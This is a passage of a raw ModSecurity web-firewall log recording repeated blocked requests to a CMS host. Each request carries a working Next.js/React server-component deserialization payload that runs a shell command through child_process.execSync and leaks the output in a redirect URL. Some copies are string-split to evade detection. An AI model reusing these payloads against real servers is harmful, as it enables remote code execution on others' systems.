_ddgm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ofsg=Buffer.from(_ddgm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ofsg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeHTJLg3zv-3QoTSgIgAAAQM"] [Sun Jan 25 23:04:56.873359 2026] [:error] [pid 10591:tid 10775] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oqbh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lpni=Buffer.from(_oqbh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lpni};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeHTJLg3zv-3QoTSgIwAAAQ0"] [Sun Jan 25 23:04:56.916176 2026] [:error] [pid 10591:tid 10796] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _aitz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sibw=Buffer.from(_aitz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sibw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeHTJLg3zv-3QoTSgJAAAARQ"] [Sun Jan 25 23:04:56.959110 2026] [:error] [pid 10591:tid 10789] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _phkc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _bkpf=Buffer.from(_phkc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bkpf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeHTJLg3zv-3QoTSgJQAAARE"] [Sun Jan 25 23:04:57.002450 2026] [:error] [pid 10591:tid 10743] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yxro=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lctf=Buffer.from(_yxro).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lctf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeHTJLg3zv-3QoTSgJgAAAQQ"] [Sun Jan 25 23:04:57.045446 2026] [:error] [pid 10591:tid 10752] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ejuc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _loep=Buffer.from(_ejuc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_loep};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeXTJLg3zv-3QoTSgJwAAAQc"] [Sun Jan 25 23:04:57.082777 2026] [:error] [pid 10591:tid 10799] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cidc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _derq=Buffer.from(_cidc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_derq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeXTJLg3zv-3QoTSgKAAAARc"] [Sun Jan 25 23:04:57.118897 2026] [:error] [pid 10591:tid 10781] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uhzw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yqwk=Buffer.from(_uhzw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yqwk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeXTJLg3zv-3QoTSgKQAAAQ8"] [Sun Jan 25 23:04:57.156704 2026] [:error] [pid 10591:tid 10766] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jyaw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bnak=Buffer.from(_jyaw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bnak};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgKgAAAQs"] [Sun Jan 25 23:04:57.193570 2026] [:error] [pid 10591:tid 10759] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hucd=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _keti=Buffer.from(_hucd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_keti};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgKwAAAQk"] [Sun Jan 25 23:04:57.230658 2026] [:error] [pid 10591:tid 10748] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _olnr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _phfl=Buffer.from(_olnr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_phfl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeXTJLg3zv-3QoTSgLAAAAQY"] [Sun Jan 25 23:04:57.267137 2026] [:error] [pid 10591:tid 10792] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dbpx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wtid=Buffer.from(_dbpx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wtid};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeXTJLg3zv-3QoTSgLQAAARI"] [Sun Jan 25 23:04:57.308450 2026] [:error] [pid 10591:tid 10756] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yvms=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vddn=Buffer.from(_yvms).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vddn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeXTJLg3zv-3QoTSgLgAAAQg"] [Sun Jan 25 23:04:57.345160 2026] [:error] [pid 10591:tid 10795] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kczd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _agfb=Buffer.from(_kczd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_agfb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeXTJLg3zv-3QoTSgMAAAARM"] [Sun Jan 25 23:04:57.381106 2026] [:error] [pid 10591:tid 10800] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gqvi=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _oidu=Buffer.from(_gqvi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oidu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgMQAAARg"] [Sun Jan 25 23:04:57.416815 2026] [:error] [pid 10591:tid 10728] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gthn=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _rnfg=Buffer.from(_gthn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rnfg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgMgAAAQE"] [Sun Jan 25 23:04:57.453114 2026] [:error] [pid 10591:tid 10734] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lkpo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uhih=Buffer.from(_lkpo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uhih};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeXTJLg3zv-3QoTSgMwAAAQI"] [Sun Jan 25 23:04:57.485999 2026] [:error] [pid 10591:tid 10778] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qern=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lffs=Buffer.from(_qern).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lffs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeXTJLg3zv-3QoTSgNAAAAQ4"] [Sun Jan 25 23:04:57.522147 2026] [:error] [pid 10591:tid 10762] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _astc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ejrq=Buffer.from(_astc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ejrq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeXTJLg3zv-3QoTSgNQAAAQo"] [Sun Jan 25 23:04:57.553618 2026] [:error] [pid 10591:tid 10797] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ciel=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jffs=Buffer.from(_ciel).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jffs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeXTJLg3zv-3QoTSgNgAAARU"] [Sun Jan 25 23:04:57.585795 2026] [:error] [pid 10591:tid 10725] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 